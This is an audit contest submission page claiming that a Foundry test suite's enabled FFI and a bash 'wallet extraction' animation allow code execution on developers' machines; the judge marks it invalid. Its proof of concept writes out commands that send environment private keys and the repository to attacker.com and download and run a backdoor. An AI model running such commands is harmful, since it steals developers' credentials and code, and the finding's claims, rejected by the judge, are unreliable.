Beatland Festival

AI First Flight #4

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Impact: high

Likelihood: high

Invalid

[H-1] Arbitrary Code Execution Enabled via FFI in Test Suite Allows Potential Compromise of Developer Systems

georgibuilds

Root + Impact

The project enables Foreign Function Interface (FFI) in `foundry.toml` and executes shell commands via `vm.ffi()` in the test suite. This allows arbitrary code execution on any developer's machine who runs `forge test`, potentially leading to complete system compromise, private key theft, and malware installation.

Description

**Expected behavior:**Test suites should not execute arbitrary system commands that could compromise developer security
Actual behavior: The test file `FestivalPass.t.sol` uses `vm.ffi()` to execute bash commands, and `ffi = true` is enabled in `foundry.toml`

**Vulnerable code:**

```solidity

// foundry.toml - Line 7

ffi = true // ❌ Enables arbitrary code execution

// test/FestivalPass.t.sol - Lines 416-438

string[] memory inputs = new string[](3);

inputs[0] = "bash";

inputs[1] = "-c";

inputs[2] = string.concat(

"echo -e '\\033[91m[!] EXTRACTING WALLET DATA...\\033[0m' > /dev/tty; sleep 0.7; ",

"echo -e '\\033[36m[*] Private Key: 0x2a871d0798f97d79848a013d4936a73bf4cc922c825d33c1cf7073dff6d409c6\\033[0m' > /dev/tty; sleep 0.3; ",

// ... more echo commands simulating wallet theft

);

vm.ffi(inputs); // ❌ Executes arbitrary shell commands

Risk

Likelihood:

- Executes automatically when any developer runs `forge test` - no user interaction required
- Affects every developer, CI/CD pipeline, and automated testing system
- No visible warning to developers that code execution will occur
- Easy to exploit - simply modify the bash commands in inputs array

Impact:

- **Complete system compromise**: Attacker can execute any command on the developer's machine
- **Private key theft**: Can read environment variables like `PRIVATE_KEY`, `MNEMONIC`, etc.
- **Data exfiltration**: Can send files, git history, or credentials to remote servers
- **Malware installation**: Can download and execute malicious binaries
- **Supply chain attack**: Compromised developer machines can inject malicious code into production
- **CI/CD compromise**: If tests run in CI, can compromise deployment pipelines

Proof of Concept

The current code demonstrates the attack vector (though using harmless echo commands). Here's how it could be weaponized:

```solidity

function test_maliciousFFI() public {

string[] memory inputs = new string[]();

inputs[0] = "bash";

inputs[1] = "-c";

// Example malicious commands (DO NOT RUN):

inputs[2] = string.concat(

// Steal private keys from environment

"curl -X POST https://attacker.com/steal -d \"$(env | grep PRIVATE)\" && ",

// Exfiltrate git repository

"tar -czf /tmp/repo.tar.gz . && curl -F 'file=@/tmp/repo.tar.gz' https://attacker.com/upload && ",

// Install backdoor

"wget https://attacker.com/backdoor.sh -O /tmp/bd.sh && chmod +x /tmp/bd.sh && /tmp/bd.sh &"

);

vm.ffi(inputs); // This would execute all malicious commands

}

```

Running `forge test` would automatically execute these commands without any user approval.

Recommended Mitigation

Remove FFI from test suite

Disable FFI in foundry.toml

1. **Disable FFI in foundry.toml:**

```diff

// foundry.toml

[profile.default]

src = "src"

out = "out"

libs = ["lib"]

remappings = [

'@openzeppelin/contracts=lib/openzeppelin-contracts/contracts',

]

- ffi = true

+ ffi = false

```

2. **Remove vm.ffi() calls from test files:**

```diff

// test/FestivalPass.t.sol - Lines 416-438

- string[] memory inputs = new string[]();

- inputs[0] = "bash";

- inputs[1] = "-c";

- inputs[2] = string.concat(/* malicious commands */);

- vm.ffi(inputs);

// If the commands were necessary for testing (they're not),

// use Foundry's built-in testing features instead

**If FFI is absolutely required for legitimate testing purposes: **- Create a separate test profile with FFI enabled - Clearly document why FFI is needed - Add security warnings in README - Use \`--ffi\` flag explicitly rather than enabling by default - Restrict FFI tests to isolated CI environments only

**The fake "wallet extraction" animation serves no testing purpose and should be completely removed**

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 12 days ago

Submission Judgement Published

Invalidated

Reason: Incorrect statement

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!